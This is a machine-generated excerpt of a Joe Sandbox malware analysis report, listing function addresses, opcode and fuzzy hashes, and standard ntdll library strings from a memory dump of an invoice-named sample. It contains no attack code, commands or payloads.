                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 16bbb5adbc2a24885095c90f82e8ff277678ca0d4bcb8888ae27a17a223209bb
                                                                                                                                        • Instruction ID: 184ac764320d8cc91ec3eabc68d98984b576ad4e3e89585a6a17a6f56bbb1857
                                                                                                                                        • Opcode Fuzzy Hash: 16bbb5adbc2a24885095c90f82e8ff277678ca0d4bcb8888ae27a17a223209bb
                                                                                                                                        • Instruction Fuzzy Hash: 5590027120140403E10075D89448646000597E0301F55D422A5424555EC6A589A16231
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 01032CC0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: bb7dadaf237ecdf8d89b276aae24e2bb4592a192c3fcaf43db12de873e17a84e
                                                                                                                                        • Instruction ID: 0de3d4d7ef649937647422aebd3cc6f22efffbcd43b9f2eafbf52bbfa8eee452
                                                                                                                                        • Opcode Fuzzy Hash: bb7dadaf237ecdf8d89b276aae24e2bb4592a192c3fcaf43db12de873e17a84e
                                                                                                                                        • Instruction Fuzzy Hash: D090026160540403E14071989458706001597D0201F55D422A0424554DC6998B6567A1
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 01032CF0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 53798e2e0e193051a6697b847203bf78f7a216e7a6950a19ce7590dc23018d3a
                                                                                                                                        • Instruction ID: b71c938c8eacd23cb08c381d2cf9573de9901dd533f36293ab863a2af763106b
                                                                                                                                        • Opcode Fuzzy Hash: 53798e2e0e193051a6697b847203bf78f7a216e7a6950a19ce7590dc23018d3a
                                                                                                                                        • Instruction Fuzzy Hash: D190027120140403E10071989548707000597D0201F55D822A0824558DD69689616221
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 01032F30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 95f64137acff97b91273ae6b2f7e48ba2ec28bdb4cc09abc37ba79c73c6eb584
                                                                                                                                        • Instruction ID: 174b17c03922f1e51dacb39f6de3d3a68ccdc80e56ed768f61acc18dbc086437
                                                                                                                                        • Opcode Fuzzy Hash: 95f64137acff97b91273ae6b2f7e48ba2ec28bdb4cc09abc37ba79c73c6eb584
                                                                                                                                        • Instruction Fuzzy Hash: 879002A134140443E10071988454B060005D7E1301F55C426E1464554DC659CD626226
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 01032F60 Relevance: .0, Instructions: 4COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 02a1a94b07ba715661958b098505b9455cfb3f5740d5257145013701bc66d8d2
                                                                                                                                        • Instruction ID: d0209701e1bb709a12450616b3ac4c403012cf11aac5ed6fbf3103d5a0fdb6f9
                                                                                                                                        • Opcode Fuzzy Hash: 02a1a94b07ba715661958b098505b9455cfb3f5740d5257145013701bc66d8d2
                                                                                                                                        • Instruction Fuzzy Hash: CA9002A121140043E10471988444706004597E1201F55C423A2554554CC5698D715225
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 01032F90 Relevance: .0, Instructions: 4COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 18bfd9c620eeca230bc09a2a91a0147e3187413e5eea695c31436f5e8a86b3f8
                                                                                                                                        • Instruction ID: f831dda85fdbd7bd294da8c61baadf56db787a246eb574e760333c0c8fd45708
                                                                                                                                        • Opcode Fuzzy Hash: 18bfd9c620eeca230bc09a2a91a0147e3187413e5eea695c31436f5e8a86b3f8
                                                                                                                                        • Instruction Fuzzy Hash: 0D90027120180403E1007198885470B000597D0302F55C422A1564555DC66589616671
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 01032FA0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 524734f50f6bfab9bcb71283aba86908678f32d3e4cf71fcf9c6df7e6d5a16a4
                                                                                                                                        • Instruction ID: 80a89c33ee20cd620ae275a501db611bb045f05505fb4986869917e6ff26cb52
                                                                                                                                        • Opcode Fuzzy Hash: 524734f50f6bfab9bcb71283aba86908678f32d3e4cf71fcf9c6df7e6d5a16a4
                                                                                                                                        • Instruction Fuzzy Hash: C590027120180403E10071988848747000597D0302F55C422A5564555EC6A5C9A16631
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 01032FB0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 45dd30a0442d7634fbbefd2ce0acf9e2edd007ac71eba1a759d5c94151a4a86b
                                                                                                                                        • Instruction ID: 70df9258ab1e9db126d69c14a8dfc53b42d43f7cb34e6078feca4f89827a806f
                                                                                                                                        • Opcode Fuzzy Hash: 45dd30a0442d7634fbbefd2ce0acf9e2edd007ac71eba1a759d5c94151a4a86b
                                                                                                                                        • Instruction Fuzzy Hash: 1890026160140043514071A8C8849064005BBE1211755C532A0D98550DC59989755765
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 01032FE0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: bf94cf275b1d93a08260f700c3bd55b3540a487088b6351056822405b78eacb7
                                                                                                                                        • Instruction ID: 7a819d6c83df9f7a9da436a26922f1e482ac1ba75dab99a20f218b406a20d289
                                                                                                                                        • Opcode Fuzzy Hash: bf94cf275b1d93a08260f700c3bd55b3540a487088b6351056822405b78eacb7
                                                                                                                                        • Instruction Fuzzy Hash: 2C900261211C0043E20075A88C54B07000597D0303F55C526A0554554CC95589715621
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 01032E30 Relevance: .0, Instructions: 4COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: c5838ac0640e63c801ddb32ebe488fa81541b069d0af8a997e634a0854195225
                                                                                                                                        • Instruction ID: 4e76fd061ae89067bb165a981d941ee9dd082001ea4f2d13210e91d4cfe58066
                                                                                                                                        • Opcode Fuzzy Hash: c5838ac0640e63c801ddb32ebe488fa81541b069d0af8a997e634a0854195225
                                                                                                                                        • Instruction Fuzzy Hash: D690026130140403E102719884546060009D7D1345F95C423E1824555DC6658A63A232
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 01032E80 Relevance: .0, Instructions: 4COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 0949b5e0a94e6df4b2421eb4eda538adfd722013fe0c9dd63c462c8fb756b0dc
                                                                                                                                        • Instruction ID: 924d2300b97699d4bdc720679622de23df601256b3a421ec59a9bba712415473
                                                                                                                                        • Opcode Fuzzy Hash: 0949b5e0a94e6df4b2421eb4eda538adfd722013fe0c9dd63c462c8fb756b0dc
                                                                                                                                        • Instruction Fuzzy Hash: 9290026160140503E10171988444616000A97D0241F95C433A1424555ECA658AA2A231
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 01032EA0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: df493650501f2f1e1c75b1165c11e8ce797a7fcebf8d8ea43a79f0f3c088b293
                                                                                                                                        • Instruction ID: 3c56c31c5552663faa6a5962f07686f91783ce9de8250f8cd7f89605dea36aed
                                                                                                                                        • Opcode Fuzzy Hash: df493650501f2f1e1c75b1165c11e8ce797a7fcebf8d8ea43a79f0f3c088b293
                                                                                                                                        • Instruction Fuzzy Hash: E39002B120140403E14071988444746000597D0301F55C422A5464554EC6998EE56765
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 01032EE0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 2bd08d72a0a3eb1ffba1d256f43e4e6d56db2138a9ad6a4daf4b419e7c9f90b9
                                                                                                                                        • Instruction ID: 0271ac98b99515a018498dad07d0b22f759e7b57dedba680842821e8a1396d34
                                                                                                                                        • Opcode Fuzzy Hash: 2bd08d72a0a3eb1ffba1d256f43e4e6d56db2138a9ad6a4daf4b419e7c9f90b9
                                                                                                                                        • Instruction Fuzzy Hash: 139002A120180403E14075988844607000597D0302F55C422A2464555ECA698D616235
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 01033010 Relevance: .0, Instructions: 4COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: cb1a13ad38bd1f8e20c1a80d950958160b375e7fc835ed4b9a24e2196d1a00b8
                                                                                                                                        • Instruction ID: 73b9229ac48a80090a1354173dff18224c2bc93ffd00f0e321ff762f9c07b1a8
                                                                                                                                        • Opcode Fuzzy Hash: cb1a13ad38bd1f8e20c1a80d950958160b375e7fc835ed4b9a24e2196d1a00b8
                                                                                                                                        • Instruction Fuzzy Hash: 1690026120184443E14072988844B0F410597E1202F95C42AA4556554CC95589655721
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 01033090 Relevance: .0, Instructions: 4COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 910c4563bd52ced6b2d6928eed7563dec80eee1841982f6d093230d31f92b358
                                                                                                                                        • Instruction ID: 7d14fdf57c22ed72bd96290a216b5a8c6fb2d05c6ea042eb5dc36e87a62e86be
                                                                                                                                        • Opcode Fuzzy Hash: 910c4563bd52ced6b2d6928eed7563dec80eee1841982f6d093230d31f92b358
                                                                                                                                        • Instruction Fuzzy Hash: B890026124140803E1407198C4547070006D7D0601F55C422A0424554DC6568A7567B1
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 010339B0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: f5f4e105d952de199340d3a757ea6592eedf971237c9ce0198db8f4a26e5d625
                                                                                                                                        • Instruction ID: 3ab93052793c07cbfdbfa881967d5e40b51396e9b0e64e8b6a41783a282b7924
                                                                                                                                        • Opcode Fuzzy Hash: f5f4e105d952de199340d3a757ea6592eedf971237c9ce0198db8f4a26e5d625
                                                                                                                                        • Instruction Fuzzy Hash: 4C90026124545103E150719C84446164005B7E0201F55C432A0C14594DC59589656321
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 01033D10 Relevance: .0, Instructions: 4COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 76a54bee6ebd55469991a96a98c04e654e5ceaf3cee082e51416e5d2b10b0930
                                                                                                                                        • Instruction ID: e9cd087c2623f9f7197056a15733f29753849d7f82edeaaf055a72ffb50fadcd
                                                                                                                                        • Opcode Fuzzy Hash: 76a54bee6ebd55469991a96a98c04e654e5ceaf3cee082e51416e5d2b10b0930
                                                                                                                                        • Instruction Fuzzy Hash: AB90027120240143A54072989844A4E410597E1302B95D826A0415554CC95489715321
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 01033D70 Relevance: .0, Instructions: 4COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 7b1317bc6569c6c44259873bd052353be7a844828b82c2b81d21ab0273e6c8b5
                                                                                                                                        • Instruction ID: 8acc0800bcdaae316fa5ff6bd7206d6b879e9a78fb6509837804005e50b07395
                                                                                                                                        • Opcode Fuzzy Hash: 7b1317bc6569c6c44259873bd052353be7a844828b82c2b81d21ab0273e6c8b5
                                                                                                                                        • Instruction Fuzzy Hash: A090027520140403E51071989844646004697D0301F55D822A0824558DC69489B1A221
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 01032C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                                                        • Instruction ID: d16f16844a40778c201be2b2cbeec34b556c7ffde69767a6d3ca0b9cf8f861aa
                                                                                                                                        • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                                                        • Instruction Fuzzy Hash:
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 01032890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ___swprintf_l
                                                                                                                                        • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                        • API String ID: 48624451-2108815105
                                                                                                                                        • Opcode ID: d220c0239b39114594c2349089e26458a8ccad54006a25d1898aab646d09b68d
                                                                                                                                        • Instruction ID: 5a0397f078503d4d736f8bb16aea11877b939cc7b1da4fe7a4d67facb897bf64
                                                                                                                                        • Opcode Fuzzy Hash: d220c0239b39114594c2349089e26458a8ccad54006a25d1898aab646d09b68d
                                                                                                                                        • Instruction Fuzzy Hash: 3951C7B5A04156BFDB11DF9C889097EFBFCBB88240B14816AF5E5E7641D334DE408BA0
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 010A2410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ___swprintf_l
                                                                                                                                        • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                        • API String ID: 48624451-2108815105
                                                                                                                                        • Opcode ID: 0d9223f39c2a08d14d66feb5fa1693b56269591694bc866bc401a08b79c3cda5
                                                                                                                                        • Instruction ID: b4d17f7a0fa86d9ddc209e65a29d57bc0cf6a8bb65f6c92318067adda8531dfa
                                                                                                                                        • Opcode Fuzzy Hash: 0d9223f39c2a08d14d66feb5fa1693b56269591694bc866bc401a08b79c3cda5
                                                                                                                                        • Instruction Fuzzy Hash: 075108B1A04645AFCB70DFECC8909BFB7F9EB44200B848479E5D6D7641DA74DA408760
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 01027630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        • Execute=1, xrefs: 01064713
                                                                                                                                        • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01064655
                                                                                                                                        • ExecuteOptions, xrefs: 010646A0
                                                                                                                                        • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01064725
                                                                                                                                        • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01064742
                                                                                                                                        • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 010646FC
                                                                                                                                        • CLIENT(ntdll): Processing section info %ws..., xrefs: 01064787
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                                        • API String ID: 0-484625025
                                                                                                                                        • Opcode ID: dde5ee3ef7b0d4a66f95a385cbaebc649f6648408f532682b8f8be51bedeb203
                                                                                                                                        • Instruction ID: 55a3e35675205820c868f08ba44766c45751f864f3db46e88396516ec5e8a3b0
                                                                                                                                        • Opcode Fuzzy Hash: dde5ee3ef7b0d4a66f95a385cbaebc649f6648408f532682b8f8be51bedeb203
                                                                                                                                        • Instruction Fuzzy Hash: CC51093160022A7AEB21EAA8DC89BED77E9BF68700F0400D9D685AB191D7719A458B51
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0103B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: __aulldvrm
                                                                                                                                        • String ID: +$-$0$0
                                                                                                                                        • API String ID: 1302938615-699404926
                                                                                                                                        • Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                                                        • Instruction ID: 6a655119e5d37d8a2d755f63d9f27d80268e15b1eec9f6fdff9e383241c44674
                                                                                                                                        • Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                                                        • Instruction Fuzzy Hash: 72819E70E052499EEF268F6CC8517EEBBE9EFC5328F18419AD8D1A7292C7348941CB51
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0101F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 010602E7
                                                                                                                                        • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 010602BD
                                                                                                                                        • RTL: Re-Waiting, xrefs: 0106031E
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                                                        • API String ID: 0-2474120054
                                                                                                                                        • Opcode ID: ef82e5b4b030e6cb294241f992b976105f4b09273d00cd0d5314bc2d1fbf85d4
                                                                                                                                        • Instruction ID: a1c9fe9974042f4337046ffa40762c86b8a137c07a8705fa8294de912c944e8c
                                                                                                                                        • Opcode Fuzzy Hash: ef82e5b4b030e6cb294241f992b976105f4b09273d00cd0d5314bc2d1fbf85d4
                                                                                                                                        • Instruction Fuzzy Hash: 75E1CD706087429FD725CF28C884B6ABBE4BF88314F144A99F5E5CB2E5D778D849CB42
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0102BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01067B7F
